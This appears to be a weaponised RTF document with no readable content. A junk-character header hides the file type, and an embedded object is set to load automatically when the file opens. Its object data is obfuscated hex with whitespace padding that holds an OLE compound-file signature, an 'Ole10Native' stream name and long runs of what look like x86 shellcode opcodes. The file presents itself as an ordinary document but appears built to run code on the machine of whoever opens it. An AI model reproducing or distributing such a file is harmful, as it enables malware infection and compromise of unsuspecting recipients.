{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objhtml\objupdate\objw10061\objh6979{\*\objdata 8d 6 f9 9 6902 0000000 7000 000724 85 36732540 000000000000
000
0
00
0100000d 0cf11e0a 1b1 1 a e100 00
000 0 0	000	0
00	0 000000 000 0000 0003e00 0 300f eff0 90006000 00 00000 0000 00
0
000 0 001 0 0
0000
01 0	00	0	0 0 00 00000
00
0	10
0	00
0020 0 0000010
0
0000feff
ff ff0 0
00 0000 0
0 00000 0f ffffffffffffff ffffffff ffffffff f	ffffff	fff	f	fff fffffff ffffff	fffff	f	ffffffff ffff f
f
fffffff ffff fff ffff ffff f f ffffff fff ffff ff ffffff ffff fffffffffffffffff	ffff	f	ff	ff	f	ffffff	f	fffffffffff	ff
f	f
f	ff ff ff
f
f f f f f f fffff
ffff ff
f
f f ffffff f fff f
f fff ff ffffffff	f	ff	ffff	f	ffff	ffff	ffff
ff	f
f	fff	f
ffff	ffff ffffffff ffff
fff fff fff f
ff	f	f	fff
fffff	f	f
ff
fff f f ffffff fffffff
f
f
f	f	fff	fff
ffffffffffff	ff	ffff	ff
ff	ffffff
fffff	ff	f	ff	ffff	f
ffff	ff
f
f	f
ffffff
f
ff
f	f	ff
ff
f	fffff
ff
f
f	fff	ffff	f	ffff
f
f	f	f fff	ff	f
f	ff	f	ff	ff	ff	ff	f	f	fff
fff f
f	ff	f
f
f
f
ff fff f ff ff
fff f ff fff
ff
f f
ffff
ff
ff
f ff ff	ff	ffff
f
f
f
f	ff
ff	ff	ff
f	ff
ffff
fff
f
f
fff
f	f	f
ff
fffffff
ff	f
f	ff
ffff	f
ff
f
f	ffff
fff f
ff f
ff ffff
ffff
f
ff f
f
f f	f	f	f	f
f f
f ffffff fff
f fffff ff ffff
fff fffff	ff
f	ffffffffffff	f	ff	f
ff	ff
fff
ff
f
ff	f	fff fffffff
f ff fff
fff fffffff ff f f ffffff fffff fffffffffffffff
ff	f
f	fff
f	fffffff ff ff ffff ffffffff
ffff f ff f
f
f ff
f
f fff
f
ffff
fff
ff
f ff	f
fffff	f
f	ff
fffff
f	f	fffff	fff	fff fffffffff	ff	fff	fff	ff	ff	f
f f fff
f f ff	ff	f ffffff
ffffff
f
f f f fffff fff ff fff
f fff
f ffd
f f ff
f
ff
ef
ff ffffe f
f fff f 0
4 000 00 0 0
50
0 000
006
0
00000fef f f ffff fff f fffffffff fffffffffffffffffff fffffffff f ff
ff f
ff
ff
ff
f
f fff
f
ff ff
f
f ff
ff
fff f ff	ffffff	ffff	f	fffffff	ffff	f	f	fff
f	f	f
fffffff
ffff
f
ffffffff
ff	ff	ff	ff	ff
f	ff	fff
ff
f	ff
f	fff	ff	f
ff
f
f
ff	f	ff	ff	f	ffff ff ffffffff fffff ff f ff ffffff fffff
fffff
f
ff f
ff ffff
f ff
fffff ff ff ff f fffff fff f fffffff	fff	ff	fffffffffffff
ff	f
fff	ff
f	ff	fffffffff	fff	fffff	fff	ff	ff	fff
ffff	ff	fff	fff
ff	fffff	ff ffff	f
f
fffffffffffff
ffff
ff	fff
ff
f
ff
ff	ff	f
ff
ffff	ffff
fff	f	ffff	fff	fff	f	ff	ff	ffff ffffffff ff	fffffff	f	ff
f	fff
ff
ff
f	f	f
f	ffffffff	fffffffffff	ff
ffff	ff	ffffff
ff	f
f	ff	f	f
fffffff	ffffff	ff	ff	fff	fffffffff	ffff	f	ffff
f
fff
f f	fff ffff fff fffff fff f
ff
fff
f
ff
ff ffff
fff f	ff	fffffff	f	fffffff	ffff	fff	fffffff	f
ff	f	f
fff
f
fff
ffffff	f
f
f	ff
f
f
f
ff	ff	fff	fff	ff	f	f	ff	ff	fff	f	ff
f	ff
f	f	fff	ffffff	ff
fffff	f	f
f	f
ff
ffffff	fffff	fffffffffffff	fff	ffffffffffff
ff
ff
f
fff	ff
f
fff	fff	fffffffff	fffffffffff	ffff	f	fffffffff
f
fff f	f
ff
f
ff	fff	f	fffffff	ffff	f	fff	ffffff	ff	f	f	ff	f	f	f	fffff	fff ffffff ffffff	fff	fff	ffffffffffff	fffffffff	ff	ff	fffff	ff	ffffff	f	fff	ff	ffffffff	fff	ff	ffff	ff	f	fffff	ff	ffffffffffffffffffffff
fffff	f fffffffffffffffffffff ff ffffffff ffffffff f fffffffff f
f 520	0	6	f006
f
0	07
40
0	200	0	4	500	6e007	4 0 072
0 079
0
00 0000
0	0	00	000
0000	0	000
000
0000000
00	0
0
000	0
0000000000	000
0000	00
00000000	0000	0	00	0	00000	000000	0	0	00	1	60	00	5	00ffff	ffff	fffff	ff	f010	00	00002ce0	200	00	0 00000c0000 0 0000000 0 460000000 0000 000	0	000000000f009	c77ad522d4	010	300000	0	00	0	7	00
0	00	00	00	0
00
01	004f00	6c006	500310	0	30004	e00	61007	4	006900760	065	0	000000	0000000000	00	000000000	000	00	00	00000	0	00	00	0000	00000
0000	0000000000	00000	00	000	00001a000201	f	fff
fff	ffff	f	ff	fffffff	fff	000000	00	000	0	0	000000	00000000	00000 0000 000000000000000 000 0	000000 000 0000000000	00000	0	c	706	000	00	0000	0	0000000	0 000000 00 00 00000	00000	00	0	0000000000	0	000000
00	0	000
00
0
000
000	0	0
00
000
0	0	0
00
00	0
0	000	0	0
0
0
00	0	0
0	00	0
0
00
0	0000	0	000	00
0
0	0
0
000000000000	000
0
000	0
0
00
0
0	0ff
f
f
f
fffff	ffffff	ffff	fff	f0000	00	0	000	0000	000	00	0	00	000000000	0000	0	0000	0	0	0000000 0 000 0
00000 0	00
0	0	0
00
0
000
0
0
00
0
000
0
00
0
00	00	0	00
00
0	00
00
0000
0000000000
0	0
0	00
0	0000	0
0	0	0	0	00
0	0000
00
0	000	000
0
00
00
0
00000000	000	00000000000	000000	0 0000 00 0000000
0 0
0 0 0
0	0	0	00	000
00	00 00
0 000 000 0 00
0
0000
000 0
00	00	fff	ff	ff	ff
ff	fff
f
f
ffff	ff	f
f
00000
0	00000	0
000	0
0	000	0
0000
000
0	0	0	00
0
000
00000	0000	0
0	00000	00000
00
0	0000 000000000 00 00000 0 0 0000	000000	00001	00000002	00	00	0	0030000000	4 0 000 0005 0 00
0000 6000 0
0 0 0700000
0080 000
0
00 9 00 0 0 0 00 a0
000 00 0b00 0000 0
c00 00000 d0	00	000	0	e0000000f0	00	0	001000	0000	1100	0	00	012000	00013	0	000001400000
0	1	500000	0	160	00000170	00	0001800000	0	19	00	00001a0000001b0	000	00	f	e	fff	f	ff	f	ffffff ffffff f ffff f fff fff fffff f f fff f fff ffff fff fff ffffff ffff fff ffff ffff ff ff ff f
fff	f	ffff	f
ff	ff
f
f
ff	f	f	ff	f
ff
f
ff	fff f
fff
ff
ff
f
f ff
fffff
fffff
f ff fff f fff ffffff ffff fff	ffff	ff	ffffff	fff	ffff	ff	ffff	fff	ff	ff	ffffffffffff	f	ff	f	ff	fff	ffff	f	ffffffffff	fff	ff	f	fff	f	f	f	fff	ff	ffff	ff	ffff	ffffff	ffffff	fffff ff ff fff f ff ffff fffff
f
ff
f fff
ffff f
f	f	fffff	f	fff	f
f
fff	fffff
f	fffffffffffff	ff	fffffff fffff fffffffff ff f
ff f ff ff f
fffff ff
f
f f
f
f
fffff
f f fff f
f	f
fffffff	f	f	f	f	ff
f ff fff
f f ff
ffff fff
f f
fffff
f
f fff f f
fff f f ff f
fff ff ff fff
f
ff fffff	ff
ff
fff	ff	f
ff	ff	f
ff
f	f
ff
f	ff
ffff
fffffff	f	f f
f
ff
ff
f f
f
ffffff f
ffff
fff
fffff
f ff ff
fff	f
ff	f
f
f
f
ff	fff
fff	f
f	fff	ff	ff	ff
f	ff
f
ffffffff	f
ff
f
f
f
f ff f f
ff fff fffffffff ffffff fff ffffff ffffff fff ffffff	f	fffffffffffff	f	ff	fff	ffffffff
f	fffffff	ff	f	fffffff
ff
ff
f
f	ff
f
ffff	f	f	f	f f
fffff
f
f
f ff ffff f fffff
fff
f
f
ff ff
f ff f ff
ff f
ff f ff ff
ff ff	ff
ff
ffff
fff
fff	f	f
f
ff
ff	ff	fff	f	ff
fffffff
ff	ff	fffffff	fff	f	fffff	f	fff	ffc30600000	3	c	501dd	2c0a010
82a7c
bac342bafff7d2	8b1	28	b0	2b	b4f98b9	ff	f 7 d3 8b 33	50	ff	d6058b8
7e88
e	2	d
f	e	86e
8	8e
f	fe
0
8	0	e3	f	34	e
4e4	a9
c
d
c4 2 3f94 4100
7
5
a
cb15 2e a8 8f
33393 92ca d5
f 5 55 7
0e0 f
78e0
2 e
0f
f
b0	86	1	48
9	2
0	f3	e
8	e8
9	a1	37d2	f
2	4f	8461	53	a
6	4	20
4
aa	631 ef9 dd4490 9 41 6 8a497 b 57dc8c02148f595889dc9 abc76f a 1102adaea1 99cdd cc9 22439 4c3 8 e1af 2ee92 1010000ad 18	01bf2	4	962e25 f43d371 65 b b9
3 54e5d a5
a 49e01
d3 a 427 8e 8
a3 aa2d
7c08e 9	96	862 2 ca
c	de
9	6	46cf0
e	eced 865
a
b1
5 b31	e
1	2
0	2
c	3dc
b	aa	a	16c	8
2	3
6de
16f4	5	c296	7d	5aa
3	29	e	d8e	1
474 e fa
37 9 d9d b
8
9 48
a8 9 56d
5 c
f2
0
16
0
d c7
c587 bf ba 6	e	b
4	2	7	0	ee	a 72
7090
1
3 95
fbb
220
389fc
5d
8 f9
e543d 63 a4
a0
9 c9
6
37e9 6b21d
a 6 4f2c959
f b
ba
0c	13	2
c88	e	9
26
204c	a
4
7
a5	e	7b
99	b	230 6 9
9 1
2f95 c
b
6327 b8 db7c 36a1cc f17 43b 1
0d3f7 1588 e5096
c2 c 8a 6
c
88 2be
1c cf 4 f 4f5 8 68496
8
00852e4efc8	ca3d7ba9570	ae70adc2934f
17	6
79ad	5861
56
900 67a 3 7b9 1 134 f6 1501 d f 9fc448a 6 4 c 4f f	1	2	7805	d	06	6	841e1	06575c256	64	213	8c46 b8 19 d 3a 7a ef1ea 0c06b3 d1ee4dd17633f4a 91 e2 1d1fad1 0006c beaadc26adeb5 d6533	d51fa6	1e72f10	795
081b8
e
4c699	665	d
22
5
56	e9770100	009c535053	05aa43	0	00005	3c54
000	0	8	1ebc
20e00005
b9
c575	653
8
1c	7ae150	0008db6	7a3c 0 0008d9
b
0465 0000 81
c	7e	b
0
a	000081e	b204
c0
00
0
8d
be9e	7	800005	b5	e5	f9d5	85b 9d e b05e9d70 0
0 0
0 05
e
eb48
eb0 7e9 e9 000 000
eb4
4
e89d 010 000eb365	89c5681c6463f0 000 81 ee1 34c0 000
8	1	c64	37	500
00	5	e
9d5	f
eb15eb0	7eb	cfe9d00
0
0
000 05 b
51	4
ef
3	c	3
1
0
6
e9
d30	0
0	00	0	e
9e	9000	0	00e	bedebc883c6	4c	ebb	5e9
d700000	09
c
575
65
7 81
e f d a
3	7
0	0
0	0
81	c	7	c	e7
f 000
0
5f5
e 5f
5 7
5f 9de
b 6	a	9c5357
5
38d	bf	e	25	00
00
08
1	c 7
0 23	b00008	1e	b	ef	0d0	00	0908dbb	3	23c	00	005	b5	f5b	9de9860000009c5381c3c60	f00
0	0eb
0
6	6	2f
7637	8a6	9
f8	d	9ba
c34	000	0	8	d9b0
95
e00	008
1 eb8
5110
0
0
05b9
d e	b289	c5	6	8	1
e
e 2 91
d0
0 0 08
1ee 22
4d 0 000 8db6 2 77d 00
005e9d 8d 8f77 fcff ff eb2f69c 087
0c3
a7 ae
b 3ae b4
6e 8 1
afffff f
e9	0e f fffff eb06 2 2 7b d4e0 f c4b8
db e 8 9 0 30000
6b c000e 9	6af
f	ff
f	fe9	29
fff
ff	fe9	01 f
ff
f
f fe
903
ff f
fffe
9
18 f ff f ffeb07eb17 e 918ffffff8	3 c 6 043 9fe72b 2eb a8e9 d4 feff f f575 0eb 875ec3dd149b 3c5c 7
c
8d 8 6 f7 6d527fff97c5e b0ae3 df14
97 b
a7dc0 184 d c
1d
a8 e c d
1c3
2 7 20
4
9
e a5bc37 5 ed8 4 0 df66
fe 1 ce 1 c74
fb
1368
4
83eb
3 2c9a 1b 7e
2	4
b	4e6e1
3	6	c
c
c0d	3b7a
1
f68e	b
9
7
5	7	c	c
18aec	45	ca317	6b	76d2127e6a	a22939	6d	40b	7bca	fd0ee	389cba331	a	4d976b	09b1 19	2bdcd1dc	2574	e0b5	bd	d
9
b	d	09
0068
f86	5a
2
1
f	d
58f0	d	de	d9c	a9a29a8b3b
725
8d6ae	44c	d	933	f 311
1a 1f 68 5 dd7 e0b5f 000a
d7 f5ab5
0 c
2dbb 6 ac 347e5
4
9d
61
9 e
f28cc17e 7 0f4 8 4c3bad 9 6f3	7a1	84816
f
f	d0
b	4	d
8	f13f
269da	1a
50	05
6
ac
e8	69
14818	6 43b8946fa6c 117a15 c4b3 5b 8 100ade7b 0e3bc59d8 8b96224 8 c 2 3b 95 e9de 8 0c6de
f
bbb
4 c88e 2
d
7
b57ec85 ea
a 5a7
b 0
e5c
d
405
7
0c
f
d 7 298
bf
c
46 bd9d7a3f
4 be
5
232
2 7f5 d2d 4
5 4
bc 5
c 0f 5 ec a8 1 7
5
0 2 375 c82 27
e5 1
5
1
5e a a
7 b fe af 5f 2
5 2
1 8
7 f9a bc
d0 75	a
5	15	01	0a
0	9	2
e
1
39b7 9e
b9
8a
730 e5d d
ad
7e13b
cde5 77627 7c640 9fd90 b ab7725166e b 7a90 9 e10 a e4 0 167 bc 7	0057fa3918	4b	8	78	a9cd671	29	2	b	9a86	5a2b3	a70	608c 7
80e
4f
76526
d d60fd6
01d 8d90
6c01455c
d6 30b8
6
c e 9 335
dd 93 f0a4b
4 a e 4 e
c 65c 27
4
86 0049c2 0b 4 b 343 d8 7846
6 333 8 933 50 8f
3 8 5b
52 3591
2 caf
1dad
c0 e7
f4f a94b2 33 7 ba64 2c5010 d8
d
23 185
f5
37
a
d6
9
b1
6	1	9	9	8c 6b bfa c50 34a 0 19
cda
6
18c0 63417 221
9
8
9
7 b1
7d 00 6
06 81f1
9 f 79
0 6
6
ccf
a d c
c1 55
93 1f
87 eebc
7 0 3 5
1 b 9 907 9
6 cc
9b fe
12c6b
37
63
19c
38
289
d 37 19cd
4
c df d7d7 6c31e 7
4845	e
0ad
e	b
0	a	bb2e
1	6	8	9
3	19d184127
9	7
8f
fec	3c	b
a
3bb	57c47817 1 05e7bbc6e2d3 c92c5c7d97 bc9814 e9d55 4625116b8 d31 d
b
3
a0 8201
60 2 d3
31
1b
bfb 0 ed2372 0c33b85d1ce216a9 1 db 4 68f05 23 9 ad0961 01 fe 4c afc 363a3a 9e 25d69 4b61 1e13 02521ddf 0 08f3ed9 2 e93aba3d641d f5ca 1 e 37 8 52b a8e3d 8 4 3f20b1	e3bf7a	0dd28	ca
d
f35
3 8 2b cb6
1 4 0 48f
3
8
a
30 2
7ae9 3
6 ce
d
b1e
d5 f 6 c f9
7
794 559
df c b 8 a 08 2 c6b 1 0e 9 f e1c0ef b
8	4
85 0cf6e779 1
0
f5
a
3
9
d3 d
b
6 f
5 d cad 22
018fbee a 5 36
9e
4f
4 5b2 f
388 e8909
ec
a9b db6 3f0e623a4d43cfc33
d4 e 2a50
51 1bdb
5
ca
e2 3c
bd
9
b
f4f8
0
17
5
2 4283 7c c01
3 9 f1 2	e
212	96
d4
a
9b8	530cdc	3e
2
60f	dfe433	7f
1	c6	6f7	9135cb773a7563ab2	2	54b9	b	287	3
0306a1c394a4d
0	d5 4 b 6c65
54832ef8 14 7f 44 09bea07a c3d1 d 94 f 1
5 c7
ab74c8 6e4 b 3f2d b 565d
c
34 07 6d4b a9 084 07
0cc
6 64
a b
9 b
1 267c2 059 3a 1ae
d75	cc4	8ed	2
d
1a1ab
de	3bd7
0	3
f6
6030
b7
d	4	b	ae e b3 d 4c
e	ac
b
a45
40	f
0f6c
b
7	37
5
ccb	dd
0	b
6
8
290	8
4eca4a
83d
f2	3	8
7d	3	e3 21
f
29
16 6 51c ed8609b 1ff9237330e 1df11bc 7	8e6	a34dc1 7337642 82 48 f d0500000 0000 0 00 000 000 0 000 000 00000 0000000 00000000 00000 00	00
0	0	0	0	00	000
0
0000
00	00
0
00000000	00	00
00	0	0 000 00
0000	0000	0000
0	0
0	0
0	0
0	000	0	000000 00000 0
0 0
0 000
00
00
00
0
00 00
000000 00 0000
0
0
00000
0 0
0 0
00 0 0
000
0
00	00000000	0000
0	0
0
0	0	000	0 000 000
00
00 0
0
000 0 0 00
0	00	0
0	00000
00
0000
0
00000 000000 0000	000
0
00
000
00	0	0
0
0000	00
000	00
00000
0	00
000000000000000	00
000
000	000
0	0
0
0
0	00
0000000000	0000	0000000	00	00	000	0000000000 0 000 000 0000000000000000 0 00 00 0 000000 0000000000
000
00000
00 0 00
0
0
00
0 00 00
0 000 0
00 0
0
0
0
0000
00	0000000000	0000000	000	0000	00
0 0
0
00
00
0 00000 0 0 00000000 00 0 0
0
0
00000 00000000 000000000000 00 000000 0000 000 0000000 0 00000 00	00000000
000000
000
00000
0
0	00000 000 0 000 00000	00000000	00	0	0000	000 00 00 000 00 0 0 0000 000027c59 4 29000 00 000}}}